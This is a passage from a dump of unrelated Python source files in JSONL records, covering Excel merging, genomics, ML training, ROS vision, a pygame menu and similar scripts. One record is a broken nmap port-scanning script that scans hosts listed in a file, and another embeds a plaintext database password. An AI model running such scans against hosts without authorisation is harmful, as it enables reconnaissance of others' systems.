status=cmd2)\n","sub_path":"pyinsteon/handlers/to_device/status_request.py","file_name":"status_request.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"586683224","text":"import openpyxl\nwb=openpyxl.load_workbook('各年业绩表.xlsx')\nnwb=openpyxl.Workbook()\nnws=nwb.active\nnws.append(['年份','月份','金额'])\nfor ws in wb.worksheets:\n l=list(ws.values)[1:-1]\n for v in l:\n nws.append((ws.title,)+v)\nnwb.save('合并2.xlsx')","sub_path":"Excel/openpyxl/zeng-demo/1.16 实例应用(多工作表合并到单工作表/1.16.2.py","file_name":"1.16.2.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"319856498","text":"# Author: Ana Poets\n# Description: Use a list of all the markers found in exome and gbs data combined. With header. This is the output of ConsensusRas_exome_gbs.R\n# GBS SNPs are in the top of the file. Choose the GBS data all times, only when GBS is NA then look at the call in the exome\n# Format of input file: \n# \n# Exome[, which(names(Exome) == \"Rusmusson\")]\n#chr7H_part1_45\tGG\n#chr7H_part1_63\tCC\n#chr7H_part1_94\tCC\n#chr7H_part1_112\tGG\n#chr7H_part1_131\tAA\n#chr7H_part1_145\tGG\n#chr7H_part1_168\tCC\n#chr7H_part1_185\tAA\n#chr7H_part1_192\tGG\n\n\nINPUT=open(\"Rasmusson_gbs_then_exome.txt\",'r')\n#INPUT.seek(0)\n\nOUTPUT=open(\"ConsensusRas_gbs_exome.txt\",\"a\")\n\n\n\n#Read file header\nINPUT.readline()\n\n# Create a dictionary for each SNP present in both exome and gbs data\nyears_dict ={}\nfor line in INPUT:\n item=line.strip('\\n').split('\\t')\n if item[0] in years_dict:\n years_dict[item[0]].append(item[1])\n else:\n years_dict[item[0]] = [item[1]]\n\n\n# Convert dict to a list so we can investigate those SNPs with multiple hits\n#lists\ntemp = []\ndictList = []\n\nfor key,value in years_dict.iteritems():\n\t#print (key + value)\n temp= [key,value]\n dictList.append(temp)\n \nCountDouble=0\nCountTriple=0\nSNPconsensus=[]\nfor SNP in dictList:\n # if there is only one value\n if len(SNP[1]) == 1:\n SNPconsensus.append((SNP[0],SNP[1][0]))\n # if there are two values for the same SNP\n if len(SNP[1]) ==2:\n CountDouble=CountDouble+1\n if SNP[1][0] == 'NA' and SNP[1][1] == 'NA':\n SNPconsensus.append((SNP[0],\"NA\"))\n else:\n if SNP[1][0] == SNP[1][1]:\n SNPconsensus.append((SNP[0],SNP[1][0]))\n else:\n if SNP[1][0] == \"NA\":\n SNPconsensus.append((SNP[0],SNP[1][1]))\n if SNP[1][1] == \"NA\":\n SNPconsensus.append((SNP[0],SNP[1][0]))\n #If the calls are different but are not NA, use the call from GBS\n #if SNP[1][0] != \"NA\" and SNP[1][1] != \"NA\" and SNP[1][0] != SNP[1][1]:\n if SNP[1][0] != \"NA\" and SNP[1][1] != \"NA\" and SNP[1][0] != SNP[1][1]:\n SNPconsensus.append((SNP[0],SNP[1][0]))\n #If there are thres values for the Same SNP\n if len(SNP[1])==3:\n CountTriple=CountTriple+1\n NApresent=SNP[1].count('NA')\n # evaluate how many sites are NA. If two sites are NA, choose the genotype in the third site as the call. If one site is NA evaluate if the other two sites\n # are the same, if so choose either one, otherwise set to NA.\n if NApresent == 3:\n SNPconsensus.append((SNP[0],SNP[1][0]))\n if NApresent == 2:\n matches=(list(SNP[1]))\n for i in matches:\n if i !='NA':\n SNPcall=SNP[0],i\n SNPconsensus.append(SNPcall)\n if NApresent == 1:\n have_value =(list(SNP[1]))\n Genotypes=[]\n for j in have_value:\n if j != 'NA':\n Genotypes.append(j)\n if Genotypes[0] == Genotypes[1]:\n SNPconsensus.append((SNP[0],Genotypes[1]))\n else:\n SNPconsensus.append((SNP[0],\"NA\"))\n if NApresent ==0:\n SNPconsensus.append((SNP[0],SNP[1][0]))\n #if SNP[1][0] == SNP[1][1] and SNP[1][1] == SNP[1][2]:\n # SNPconsensus.append((SNP[0],SNP[1][0]))\n #else:\n # SNPconsensus.append((SNP[0],\"NA\"))\n\nfor i in SNPconsensus:\n print >> OUTPUT, i[0],i[1]\n\nINPUT.close()\nOUTPUT.close()\n\n\n\n\n\n\n\n\n","sub_path":"Analysis/2_Ras_consensus/Step2_ConsensusRas_gbs_exome_merge.py","file_name":"Step2_ConsensusRas_gbs_exome_merge.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"217845613","text":"import torch\n\nfrom horcorr import HorCorrFunction\n\ndef profile():\n batch = 8\n height = 128\n width = 256\n n_windows = 64\n dim = 128\n\n device = torch.device('cuda:0')\n inp0 = torch.empty((batch, dim, height, width + n_windows - 1), dtype=torch.float32, device=device)\n inp1 = torch.empty((batch, dim, height, width), dtype=torch.float32, device=device)\n\n inp0.uniform_()\n inp1.uniform_()\n\n inp0.requires_grad_()\n inp1.requires_grad_()\n\n corr = HorCorrFunction.apply(inp0, inp1)\n corr.sum().backward()\n\n inp0.grad.data.cpu()\n inp1.grad.data.cpu()\n\n torch.cuda.profiler.cudart().cudaProfilerStop()\n\nif __name__ == '__main__':\n profile()","sub_path":"profile/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"295981396","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport numpy as np\nimport roslib\nroslib.load_manifest('begineer_tutorial')\nimport sys\nimport rospy\nimport cv2\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\nclass image_converter:\n\n def __init__(self):\n \n self.bridge = CvBridge()\n self.image_sub = rospy.Subscriber(\"/camera/rgb/image_color\",Image,self.callback)\n\n def callback(self,data):\n \n cv_image = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n \n\n image = cv2.cvtColor(cv_image , cv2.COLOR_BGR2HSV)\n lower_range = np.array([30,150,50])\n upper_range = np.array([255,255,180])\n mask = cv2.inRange(image , lower_range, upper_range)\n res = cv2.bitwise_and(cv_image, cv_image, mask=mask)\n cv2.imshow(\"Image window\", res) \n # print(res)\n\n\n #cv2.imshow(\"Image window\", cv_image)\n cv2.waitKey()\n\n \n\ndef main(args):\n ic = image_converter()\n rospy.init_node('image_converter', anonymous=True)\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main(sys.argv)","sub_path":"node1.py","file_name":"node1.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"200560357","text":"import nmap\n\ndef write_to_file(host,result):\n name = \"%s.txt\"%(host)\n file = open(name,'w')\n file.write(result)\n file.close()\nfor host in hosts:\n nm.scan(host,'21-1000')\n res = \"Host : %s\" %host + '\\n' + \"State : %s\" %nm[host].state() + '\\n'+ \"info : %s\" %nm.scaninfo()\n write_to_file(host,res)\n\ndef port_scanner():\n file = open('hosts.txt','r')\n hosts = file.read()\n hosts = hosts.split('\\n')\n\n nm = nmap.PortScanner()\n \ndef main():\n port_scanner()\n\nmain()\n","sub_path":"assignment4.py","file_name":"assignment4.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"479509192","text":"from __future__ import print_function\nimport time, sys\nimport numpy as np\nfrom src.utils import *\nfrom src.read_mnist import read_train_dev_mnist\n\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nimport torchvision.datasets as datasets\n\nnp.random.seed(1337) # for reproducibility\n\n## ---------------------------------------------------------------------------------------------------------------------\n# read data\nx_train, y_train, x_dev, y_dev = read_train_dev_mnist()\n\nprint(' x_train: %s' % str(x_train.shape))\nprint(' x_dev: %s' % str(x_dev.shape))\n\n## ---------------------------------------------------------------------------------------------------------------------\n# train config\nn_epochs = 100\nbatch_size = 300\n\n## ---------------------------------------------------------------------------------------------------------------------\n# net dims\ninput_dim = x_train.shape[1]\noutput_dim = y_train.shape[1]\n\nprint(' input_dim: %d' % input_dim)\nprint(' output_dim: %d' % output_dim)\ny_train = np.argmax(y_train, axis=1)\ny_dev = np.argmax(y_dev, axis=1)\n\n# --------------------\n\nfrom dataset import Dataset\nimport torch.utils.data as data\ntrainset = Dataset(x_train, y_train)\ntrainloader = data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=6)\n\n\n# --------------------\nfrom net import Net\nnet = Net(input_dim, output_dim)\n\n## ---------------------------------------------------------------------------------------------------------------------\n# train\ncprint('c','\\nTrain MNIST:')\ncost_train = np.zeros(n_epochs)\ncost_dev = np.zeros(n_epochs)\nerr_dev = np.zeros(n_epochs)\n\nnb_samples_train = x_train.shape[0]\nnb_samples_dev = x_dev.shape[0]\n\nbest_cost = np.inf\n\nfor i in range(n_epochs):\n net.set_mode_train(True)\n # ---- W\n tic = time.time()\n for x, y in trainloader:\n loss = net.fit(x, y)\n cost_train[i] += loss / float(nb_samples_train) * float(len(x))\n\n # for ind in generate_ind_batch(nb_samples_train, batch_size):\n # loss = net.fit(x_train[ind], y_train[ind])\n # cost_train[i] += loss / float(nb_samples_train) * float(len(ind))\n\n toc = time.time()\n\n # ---- print\n print(\"it %d/%d, Jtr = %f, \" % (i, n_epochs, cost_train[i]), end=\"\")\n cprint('r',' time: %f seconds\\n' % (toc - tic))\n sys.stdout.flush()\n\n # ---- dev\n if i % 5 == 0:\n net.set_mode_train(False)\n for ind in generate_ind_batch(nb_samples_dev, batch_size, random=True):\n cost, err = net.eval(x_dev[ind], y_dev[ind])\n cost_dev[i] += cost / float(nb_samples_dev) * float(len(ind))\n err_dev[i] += err / float(nb_samples_dev)\n cprint('g',' Jdev = %f, err = %f\\n' % (cost_dev[i], err_dev[i]))\n if cost_dev[i] < best_cost:\n best_cost = cost_dev[i]\n net.save('model/theta_best')\n\n## ---------------------------------------------------------------------------------------------------------------------\n# save model\nnet.save('model/theta_last')\n\n## ---------------------------------------------------------------------------------------------------------------------\n# fig cost vs its\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nplt.figure()\nplt.plot(cost_train, 'r')\nplt.plot(range(0, n_epochs, 5), cost_dev[::5], 'bo--')\nplt.ylabel('J')\nplt.xlabel('it')\nplt.grid(True)\n# plt.show(block=False)\nplt.savefig('train_cost.png')\n","sub_path":"1_mnist/4_example_mlp_batchnorm_class_based_dataloader/run1_train.py","file_name":"run1_train.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"554099888","text":"# 고위함수\n# - 함수를 인수로 받거나, 함수를 결과로 반환하는 함수를 고위 함수 라고 한다\n# - map, sorted 등등\n\nfruits = ['strawberry', 'fig', 'apple', 'cherry', 'raspberry', 'banana']\na = sorted(fruits, key=len) # len 함수를 key의 인자로 전달한다\nprint(a)\n\n\ndef reverse(word):\n return word[::-1]\n\n\n# 단어 처라를 거꾸로 해서 정렬\na = sorted(fruits, key=reverse)\nprint(a)\n\n\n# - map(), reduce(), filter(), apply() 등의 고위 함수가 널리 알려져 있다\n# - apply()는 파이썬 2.3.에서 중단 3에서는 제거\n# - map, reduce, filter는 여전히 존재하지만 대부분의 경우 더 나은 다른 방법이 있다\n\n\n# Map, Filter, Reduce의 대안\n# - 지능형 리스트와 제너레이터 표현식이 소개된 후에는 이 함수들의 중요성이 떨어졌다\n# - 지능형 리스트나 제너레이터 표현식이 map과 filter의 조합이 처리하는 작업을 표현할 수 있을 뿐만 아니라 가독성이 더 좋기 때문\n\ndef factorial(n):\n '''returns n!'''\n return 1 if n < 2 else n * factorial(n - 1)\n\n\nlist(map(factorial, range(6))) # 함수형\n[factorial(n) for n in range(6)] # 제너레이터 표현식\n\nlist(map(factorial, filter(lambda n: n % 2, range(6)))) # 함수형\n[factorial(n) for n in range(6) if n % 2] # 제너레이터 표현식\n\n# - 파이썬3에서 map, filter는 제너레이터(일종의 반복 가능 객체)를 반환하므로, 제너레이터 표현식이 이 함수들을 직접 대체한다\n# - 내장 되어 있던 reduce는 functools 모듈로 떨어져 나왔다. reduce는 주로 합계를 구할때 사용 하는데 내장 함수 sum()이 더 좋다\n\nfrom functools import reduce\nfrom operator import add\n\nreduce(add, range(100))\nsum(range(100)) # 함수를 임포트하거나 추가할 필요 없다\n# - sum과 reduce는 연속된 항목에 어떤 연산을 적용해서, 이전 결과를 나주거시키면서 일련의 값을 하나의 값으로 리덕션 한다는 공통점이 있다\n\n# - 내장된 reduction 함수\n# - all(iterable)\n# - any(iterable)","sub_path":"05_First_Class/02_HIgh-order_function.py","file_name":"02_HIgh-order_function.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"652905517","text":"import mysql.connector\nimport csv\nimport numpy as np\nfrom datetime import datetime\nimport numpy as np\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nimport matplotlib.pyplot as plt\ndef selectInDataBase(sqlConnection, select):\n cursor = sqlConnection.cursor()\n cursor.execute (select)\n fields = map(lambda x:x[0], cursor.description)\n fields=[]\n for x in cursor.description:\n fields.append(x[0])\n ret=[]\n for data in cursor.fetchall():\n line={}\n for i in range(len(fields)):\n line[fields[i]]=data[i]\n ret.append(line)\n return ret\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"123456\",\n database=\"elo7_datascience\",\n get_warnings=False,\n raise_on_warnings=False\n)\n\nidUser=61\nsql=\"\"\"SELECT gs.valuesdata as valuesdata, gs.idmovie as idmovie FROM genome_scores_at_one_line as gs\n inner join ratings as ra on ra.idmovie=gs.idmovie\n WHERE ra.iduser = {d0};\"\"\".replace(\"\\n\",\" \").format(d0=idUser)\n\n\ngenome_scoresAtSqlSelect=selectInDataBase(mydb,sql)\n\ngenome_scores=np.zeros((len(genome_scoresAtSqlSelect),len(genome_scoresAtSqlSelect[0]['valuesdata'].split(\",\"))))\n\nconverterPostionAtGenome_scoresToIdMovie={}\nconverterIdMovieToPostionAtGenome_scores={}\nfor i in range(len(genome_scoresAtSqlSelect)):\n\n lineForGenomeScore=list(csv.reader([genome_scoresAtSqlSelect[i]['valuesdata']]))[0]\n genome_scores[i]=np.array(lineForGenomeScore,dtype=np.float)\n converterPostionAtGenome_scoresToIdMovie[i]=genome_scoresAtSqlSelect[i]['idmovie']\n converterIdMovieToPostionAtGenome_scores[genome_scoresAtSqlSelect[i]['idmovie']]=i\n\nX=genome_scores\nscaler = StandardScaler()\nscaler.fit(X)\nX=scaler.transform(X) \npca = PCA()\ncomponentsForObjects = pca.fit_transform(X)\n\nx=[[],[],[],[],[],[],[],[],[],[]]\ny=[[],[],[],[],[],[],[],[],[],[]]\n\nsql=\"\"\"SELECT rating, idmovie FROM ratings \n where iduser={d0} \"\"\".replace(\"\\n\",\" \").format(d0=idUser)\ncursor = mydb.cursor()\ncursor.execute (sql)\nfor (rating,idmovie) in cursor:\n if(idmovie in converterIdMovieToPostionAtGenome_scores ):\n position=converterIdMovieToPostionAtGenome_scores[idmovie]\n #if(rating<4.0):\n #x[0].append(componentsForObjects[position][0])\n #y[0].append(componentsForObjects[position][1])\n #else:\n #x[1].append(componentsForObjects[position][0])\n #y[1].append(componentsForObjects[position][1])\n x[int(float(rating))-1].append(componentsForObjects[position][0])\n y[int(float(rating))-1].append(componentsForObjects[position][1])\n\ncolors=[\"red\",\"green\",\"blue\",\"cyan\",\"magenta\"]\n#x=[[2.2,5.0,6.0],[2.2,5.0,6.0]]\n#y=[[1.2,5.0,6.0],[2.2,6.0,7.0]]\nfig = plt.figure()\n\nax = fig.add_subplot(1, 1, 1, axisbg=\"1.0\") \n\ncoi=0\nvolume=[70.0,70.0,70,70,70,70,70]\nalpha=[0.3,0.3,0.3,0.3,0.3]\ncoi=0\nfor i in [0,1,2,3,4]: \n ax.scatter(x[i], y[i],c=colors[coi],label=i,edgecolors='none', s=volume[coi], alpha=alpha[coi])\n coi=coi+1\nplt.title('Matplot scatter plot')\nplt.legend(loc=2)\nplt.show()\nprint(\"oi\")\n","sub_path":"explorationDatabase/calculatePCAOverGenomeScoresOfJustOneUser.py","file_name":"calculatePCAOverGenomeScoresOfJustOneUser.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"209242081","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nFile: repair_conf.py\nAuthor: lsl\nEmail: ux_lsl@163.com\nDescription: 修复conf的配置\n\"\"\"\n\nfrom house.models import HouseConfig\nfrom house.parser import get_url_params\n\n\ndef run():\n for conf in HouseConfig.objects.all():\n lst = []\n print('修复{}的配置'.format(conf))\n for url in conf.init_urls:\n url_tpl, params, lst_xpath = get_url_params(url)\n if lst_xpath is None:\n if 'esf' in url_tpl:\n lst_xpath = '/html/body/div[4]/div[4]/div[4]'\n elif 'anjuke' in url_tpl:\n lst_xpath = '//*[@id=\"houselist-mod-new\"]'\n a = {\n 'url_tpl': url_tpl,\n 'lst_xpath': lst_xpath,\n 'params': [\n {\n 'type': 1,\n 'var_name': 'page',\n 'val': 50,\n },\n {\n 'type': 3,\n 'var_start_name': 'price_start',\n 'var_end_name': 'price_end',\n 'var_start_val': params['price_start'],\n 'var_end_val': params['price_end'],\n },\n {\n 'type': 3,\n 'var_start_name': 'area_start',\n 'var_end_name': 'area_end',\n 'var_start_val': params['area_start'],\n 'var_end_val': params['area_end'],\n }]\n }\n lst.append(a)\n conf.tpl_urls = lst\n conf.save()\n","sub_path":"demo/src/YWebAdmin/scripts/repair_conf.py","file_name":"repair_conf.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"574113542","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : hvalle <me@wsu.com>\nDate : 8/9/2021\nPurpose:\n\"\"\"\n\n\ndef fibo():\n \"\"\"Fibo series\"\"\"\n numbers = []\n while True:\n if len(numbers) < 2:\n numbers.append(1)\n else:\n numbers.append(sum(numbers))\n numbers.pop(0)\n yield numbers[-1]\n continue\n\n\ndef gen246():\n print('About to yield 2')\n yield 2\n print('About to yield 4')\n yield 4\n print('About to yield 6')\n yield 6\n print('About to return')\n\n\ndef gen123():\n yield 1\n yield 2\n yield 3\n\n\ndef first(iterable):\n iterator = iter(iterable)\n try:\n return next(iterator)\n except StopIteration:\n raise ValueError('Iterable is empty')\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"Review Iterator and Generators\"\"\"\n # iterable = ['Spring', 'Summer', 'Fall', 'Winter']\n # print(type(iterator))\n # print(first(iterable))\n # print(first(iterable))\n # g = gen123()\n # print(type(g))\n for v in gen123():\n print(f'Value is {v}')\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"Day1/my_generators.py","file_name":"my_generators.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"267557638","text":"import math\n\ndef independent_alleles(k, N):\n n_AaBb = int(N)\n pop = 2**k\n prob = []\n\n while n_AaBb <= pop:\n # Calculate possible orderings of genotypes\n comb = math.factorial(pop)/(math.factorial(pop-n_AaBb)*math.factorial(n_AaBb))\n # Calculate probability of occurence of a number of AaBb\n # in the total population. Accounting for all possible arrangements.\n # Append the result to the probabilities array.\n prob.append((0.25**n_AaBb * 0.75**(pop-n_AaBb))*comb)\n # Increment the number of AaBb genotipes to calculate probabilities for\n # all the scenarios with more AaBb genotypes than the provided N argument\n n_AaBb = n_AaBb+1\n\n # Sum over the prob array to return the overall probability of having AT LEAST\n # N AaBb genotypes at the k generation\n return sum(prob)\n","sub_path":"Bioinformatics stronghold/LIA.py","file_name":"LIA.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"126950198","text":"import M_settings as settings #use PM_settings for matrices\nimport os\n\n\n# collects the names of each subject's raw data files\ndef get_files(subjid, block):\n txtfiles = [os.path.join(settings.rawfiles_dir, f) for f in os.listdir(settings.rawfiles_dir)\n if os.path.isfile(os.path.join(settings.rawfiles_dir, f)) and '.txt' in f\n and block in f and str(subjid) in f]\n\n gazefile = None\n blinkfile = None\n pupilfile = None\n behavfile = None\n\n for txtfile in txtfiles:\n if 'gaze' in txtfile:\n gazefile = txtfile\n if 'blink' in txtfile:\n blinkfile = txtfile\n if 'pupil' in txtfile:\n pupilfile = txtfile\n if 'behav' in txtfile:\n behavfile = txtfile\n\n print(\"data for block: %s\" %block)\n print(gazefile)\n print(blinkfile)\n print(pupilfile)\n print(behavfile)\n\n return [gazefile, blinkfile, pupilfile, behavfile]\n\n # Read each subject's raw data files. Headers are specified in settings\ndef read_tsv(filename, headers):\n rows = []\n\n with open(filename, 'r') as f:\n for line in f:\n data = line.rstrip().split('\\t')\n\n row_data = {}\n column_cnt = 0\n for header in headers:\n row_data[header] = data[column_cnt]\n column_cnt += 1\n\n rows.append(row_data)\n\n return rows\n\n# collects data from the raw data files ###check\ndef get_new_data_row():\n row = {}\n for val in settings.gazecols:\n row[val] = settings.default_value\n #for val in settings.behavcols:\n #row[val] = settings.default_value\n\n return row\n\n# ogama needs trials starting at 1 so we modify all the trials for all processing\ndef trial_reindex(row):\n row['Trial'] = int( row['Trial']) + 1\n\n# helps combine blink/pupil data with gaze file\ndef add_ocular_data_to_dataset(combined_data_set, rows):\n for r in rows:\n key = r['Trial'] + ':' + r['Time']\n if key not in combined_data_set:\n combined_data_set[key] = get_new_data_row()\n for col, value in r.items():\n combined_data_set[key][col] = value\n\n## functions to assign a condition to each trial. conditions specified in settings.\n# sets keys for trial number\ndef get_dic(filename):\n d = {}\n with open(filename, 'r') as d_list:\n for line in d_list:\n (key, val) = line.rstrip().split('\\t')\n d[int(key)] = val\n return d\n# maps the condition to the trial key\ndef map_conditions(new_column, row_data, trial_dic):\n if row_data['Trial'] not in trial_dic:\n raise Exception('trial not found %s' % row_data['Trial'])\n\n row_data[new_column] = trial_dic[row_data['Trial']]\n\n# ogama can only read sbj ids that start with a letter\ndef ogama_subject(subjid, block, row):\n row['Subject_ogama'] = 'tp' + str(subjid) + block\n\n# add subject and block information to the files\ndef subject_block(subjid, block, row):\n row['PID'] = subjid\n row['Block'] = block\n\n# calculate accuracy based on behavioral info\ndef acc(row):\n #raise exception if behavioral information is missing?\n row['ACC'] = 1 if row['CorrectAnswer'] == row['SubjectResponse'] else 0\n\n# write out function to\ndef output_rows(filepath, rows):\n if len(rows) == 0:\n raise Exception('Nothing to write!')\n\n with open(filepath, 'w') as f:\n headers = list(rows[0].keys())\n f.write('\\t'.join(headers))\n f.write('\\n')\n\n for row in rows:\n values = [str(row[header]) for header in headers]\n line = '\\t'.join(values)\n f.write(line)\n f.write('\\n')\n\n# map answer picture to position\ndef map_picture_aoi(row, rule_dict, listAOIs):\n pic_aoi_dict = {}\n picture_ids = listAOIs.split(',')\n aoi = 1\n for pic in picture_ids:\n pic_aoi_dict['A'+str(aoi)] = (pic, rule_dict[int(pic)])\n aoi += 1\n return pic_aoi_dict\n\n\ndef map_answer_rules(new_column, row, dic_rules):\n response = int(row['SubjectResponse'])\n if response not in dic_rules:\n raise Exception('rule associated with answer picture %s not found' % response)\n else:\n row[new_column] = dic_rules[response]\n","sub_path":"scripts/progressive_matrices/df_utils_m.py","file_name":"df_utils_m.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"89969366","text":"\nimport pandas as pd\nimport requests\nimport math\nfrom scipy.spatial import distance\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import metrics\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.cross_validation import train_test_split\nimport time\nimport numpy\n\ndef getErrors(test, prediction, npis, dataframe):\n prediction = prediction.tolist()\n typeOneErrors = [] # incorrectly predicted that they are Psychiatrist\n typeTwoErrors = [] # incorrectly predicted that they are not Psychiatrist\n for i in range(len(test)):\n if (test[i] != prediction[i]):\n if (test[i] == 0 and prediction == 1):\n typeOneErrors.append(npis[i])\n else:\n typeTwoErrors.append(npis[i])\n typeOneDF = dataframe[dataframe['npi'].isin(typeOneErrors)]\n typeTwoDF = dataframe[dataframe['npi'].isin(typeTwoErrors)]\n return [typeOneDF, typeTwoDF]\n\ndef nullAccuracy(Y_Test):\n oneCount = 0\n zeroCount = 0\n for x in Y_test:\n if x == 1:\n oneCount += 1\n else:\n zeroCount += 1\n oneAverage = (float((oneCount)) / (oneCount + zeroCount)) * 100\n zeroAverage = 1 - oneAverage\n nullAccuracy = max(oneAverage, zeroAverage)\n return nullAccuracy\n\ndef getData():\n start_time = time.time()\n\n numberOfEntries = \"$limit=50000\"\n selectClause = \"$select=npi,total_claim_count,drug_name,specialty_desc\"\n query = \"https://data.cms.gov/resource/hffa-2yrd.json?\" + selectClause + \"&\" + numberOfEntries \n dataFrame = pd.read_json(query)\n \n crosstab = pd.crosstab([dataFrame[\"npi\"], dataFrame[\"specialty_desc\"]], dataFrame[\"drug_name\"])\n drugList = crosstab.keys() # list of all drugs. 1 if doctor has prescribed it 0 if not\n npis = [] # array of npi's\n data = [] # each entry is an array of drugs prescribed\n labels = [] # each entry is either 1 for Psychiatrist, 0 if not.\n \n psychCount = 0\n nonPsychCount = 0\n \n # need more efficient way to handle this\n for index, row in crosstab.iterrows():\n if (psychCount > 1313): # made it 10x faster, this loop is what takes so long\n break\n if (index[1] == \"Psychiatry\"):\n labels.append(1)\n psychCount += 1\n else:\n if (nonPsychCount > 1313):\n continue\n labels.append(0)\n nonPsychCount += 1\n newArray = [] # holds drugs they prescribed\n for drug in drugList:\n newArray.append(row[drug])\n data.append(newArray)\n npis.append(index[0])\n\n print(\"Number of Psychiatrists: \" + str(psychCount) + \", Other Specialities: \" + str(nonPsychCount))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n X_train, X_test, Y_train, Y_test = train_test_split(data, labels, random_state=0)\n \n logreg = LogisticRegression()\n logreg.fit(X_train, Y_train)\n \n predictions = logreg.predict(X_test)\n \n errors = getErrors(Y_test, predictions, npis, dataFrame)\n typeOneErrors = errors[0]\n typeTwoErrors = errors[1]\n # print typeTwoErrors\n \n AUC = metrics.roc_auc_score(Y_test, predictions)\n print(AUC)\n \n fpr, tpr, thresholds = metrics.roc_curve(Y_test, predictions)\n plt.plot(fpr, tpr)\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.0])\n plt.title(\"Psychiatrist Prediction Classifier\")\n plt.xlabel('False Positive Rate')\n plt.ylabel(\"True Positive Rate\")\n plt.grid(True)\n plt.show()\n\nif __name__ == \"__main__\":\n getData()\n","sub_path":"logisticRegression.py","file_name":"logisticRegression.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"582511878","text":"\"\"\"\nVertrekt van de tijdreeksen van de features van het teamleader ecosysteem.\nInput:\n - Feature \n - Specifiek bedrijf in het teamleader ecosysteem\nOutput:\n\n - Boxplot voor het bedrijf en de feature\n\"\"\"\n\nimport sys\n\nif sys.argv[1] == '-h':\n print(\"<pivot_table.py -feature -firm(s) >\")\n quit()\n \nimport pandas as pd\nimport numpy as np\nimport pickle \nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n\n\nfeature = sys.argv[1]\nfirm = sys.argv[2]\nfirms = sys.argv[2:]\nprint(firms)\n\npivot_tables = pickle.load(open('pivot_tables.p', 'rb'))\n\n\ntry:\n if len(sys.argv) > 3:\n print(pivot_tables[feature][firms].describe())\n pivot_tables[feature][firms].plot(kind='box')\n else:\n print(pivot_tables[feature][[firm]].describe())\n pivot_tables[feature][[firm]].plot(kind='box')\n plt.title('Boxplot of feature '+ feature)\n plt.ylabel(feature)\n plt.show()\nexcept:\n print('Feature or Firm not recognized')\n quit()\n\nquit()\n\n","sub_path":"pivot_table_boxplot.py","file_name":"pivot_table_boxplot.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"323731055","text":"import pygame\nimport highscores\nimport sys\nimport Button\nimport findButton\nimport Game\n\ndef menu():\n '''\n This function sets up the display for the main menu and has some logic determining whether or not the menu should remain on screen.\n param list: none\n returns: None\n '''\n white=(255,255,255)\n red=(255,0,0)\n green=(0,255,0)\n screen = \"menu\"\n brown = (139, 69, 19)\n while screen == \"menu\":\n title = pygame.image.load(\"title.png\")\n present = pygame.image.load(\"present.png\")\n treeStar = pygame.image.load(\"treeStar.png\")\n gameDisplay = pygame.display.set_mode((970,650))\n gameDisplay.fill(red)\n pygame.display.set_caption(\"Winter Card Matcher\")\n gameDisplay.blit(title,(100,0))\n gameDisplay.blit(present,(600, 300))\n gameDisplay.blit(treeStar, (250, 150))\n running = True\n\n play = Button.Button(gameDisplay, white, green, white, (200, 230), (175, 50), \" START\")\n\n stump = Button.Button(gameDisplay, white, brown, brown, (260, 480),(50, 50), \"\")\n\n highscore = Button.Button(gameDisplay, white, green, white, (160, 330), (250, 50), \" HIGHSCORES\")\n\n 